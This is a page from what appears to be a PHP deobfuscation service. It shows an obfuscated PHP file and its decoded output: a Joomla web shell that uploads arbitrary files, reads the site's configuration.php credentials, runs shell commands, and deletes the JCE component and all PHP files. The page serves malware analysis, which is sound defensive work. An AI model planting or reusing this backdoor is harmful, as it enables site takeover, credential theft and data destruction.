Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(str_rot13(base64_decode('lUXBYdNAED23Rf9uYyLtulrsImHEyQFjQykQVUUuRLRd..
Decoded Output download
error_reporting(0);
echo "<title>+[ Joomla is Free ]+</title>";
$os = php_uname();
echo "<center> Info-Kang:".$os." </center>";
if (!empty($_FILES)) {
$tempFile = $_FILES['Fileupload']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['kemana'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Fileupload']['name'];
move_uploaded_file($tempFile,$targetFile);
echo "1";
}
if(isset($_GET['read'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
echo "<pre><font size=3 color=#000000>".shell_exec('echo KcB#`pwd`#KcB; ls -lia; rm -f *.gif')."</font></pre>";
if(isset($_GET['patch'])){
$deljce = '../../components/com_jce/jce.php';
unlink($deljce);
}
if(isset($_GET['del'])){
$mask = "*.php";
array_map( "unlink", glob( $mask ) );
echo "<pre><font size=3 color=#000000>".shell_exec('rm -f *.php')."</font></pre>";
}
Did this file decode correctly?
Original Code
<?php eval(gzinflate(str_rot13(base64_decode('lUXBYdNAED23Rf9uYyLtulrsImHEyQFjQykQVUUuRLRdnGSyce211hugoP47s2lFgpQLli2t/d68N/PGda2xwm9yrEblml+Hg4tmzDYGgsQpp2RntYBqxhRNgqpueRFubJXELRYQuXh3GE+1qcSulAXyI4EMWIdpBDdyYfq3sly/DCKiVAEk8R7zCioH/gyLyj3wrhjfvEJ0bgi/L87Puo6+jpVTMtgjC+bfapU2ZcWWC+aKV2tbthw0BdKu0X2SYdOUzNLpl2e6YGImr+8+pB/nbzqZzNkSIsKm6ee7ZzZfsC0WspTNShazI5m9M9SuVlXLDDmLcNYjTe/IKnn0Qbb3t7WzwnxU0SK4EjnR+NN8vSPHsG63CT738Tz6hLiqeGeUz9uUTbbo5cOQT+pzpsypWC8oVU/Qu6N5eB5RRFm3x9VtdKVGpox1QsHThpra1m6/scriKMlWAXf1C4cvIDPa2G7nurlTTkdiQ3iBPzHjrKm5zV5o7qsfq/sOnQageOh4JQdgC+jnYxmtSM7CKFVvrzpXb+/QLv3fkSrpss1uphXqYpnPnh1zKCpG+qn8RBAW0+OH8fvalU2VW76vCkJUU+BOvZD1lrSDyyYNolh45YMoccUhdcWCHqy1+cqhJYdj9Er/SlOHGHyrp29r/AM=')))); ?>
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 2588b55099ce6fc6f5d30823de9a7846 |
Eval Count | 1 |
Decode Time | 85 ms |